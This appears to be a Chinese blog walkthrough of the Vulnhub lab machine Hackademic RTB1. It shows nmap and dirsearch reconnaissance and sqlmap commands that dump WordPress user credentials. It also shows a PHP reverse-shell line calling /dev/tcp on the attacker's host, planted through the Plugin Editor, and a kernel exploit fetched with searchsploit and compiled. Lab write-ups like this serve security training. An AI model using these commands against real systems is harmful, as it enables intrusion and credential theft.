【Vulnhub靶机】Hackadmeic.RTB1

系列:Hackademic(此系列共2台)
难度:初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

image-20230819150242058

端口扫描

nmap -A -p- 192.168.80.143

image-20230819151707785

访问80端口

image-20230819151453856

使用指纹识别插件查看是WordPress

image-20230819151946799

根据首页显示的内容,点击target

image-20230819152040904

image-20230819152140328

点击 页面能点击的链接,发现点击Uncategorized的时候,链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

image-20230819152319809

尝试有无SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞

image-20230819152424365

目录扫描

单纯的爆破IP地址,扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200   

image-20230819164419748

开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

image-20230819164354082

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch 

image-20230819152623542

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

image-20230819152737643

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch 

image-20230819152939501

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

image-20230819153048717

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

image-20230819164537854

使用一个用户密码登录 NickJames密码:admin

image-20230819165028767

登上 之后没有什么能够 利用的,尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3,发现在Plugins选项里有一个Plugin Editor编辑的地址,加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

image-20230819184510299

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的 路径,找出路径才能触发反弹shell


找到提交路径方式一:


wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有你上传的图片,视频和附件。

WordPress文件夹内,你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错,这是你的仪表板你登陆wordpress后看到的界面,包括所有的后台文件

wp-content包含你所有的内容,包括插件 , 主题和您上传的内容

Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内

同样,theme主题文件夹保存你所有的主题。 插件一样,每个主题有单独的文件夹。

Uploads文件夹,所有你上传图片,视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库,是必要的WordPress管理,编辑和JavaScript库,CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录,可以访问一下看看

image-20230819171036292

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

image-20230819171102568

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell,刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

image-20230819184413751

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

image-20230819171841864

image-20230819171903184

就看到了hello.php,点击hello.php触发反弹shell (耐心等待-----------------)

image-20230819172020273

内核提权

查看内核版本

uname -a

image-20230819180019128

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230819180245056

查看完整路径

searchsploit -p linux/local/15285.c 

image-20230819180544957

把这个15285.c复制到apache服务的根路径/var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

image-20230819184303398

gcc 15285.c -o exp

# 将15285.c预处理、汇编、编译并链接形成可执行文件exp

#-o选项用来指定输出文件的文件名

15285.c预处理、汇编、编译并链接形成可执行文件exp

-o选项用来指定输出文件的文件名


image-20230819185040509

在这里插入图片描述

闯关成功!!!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值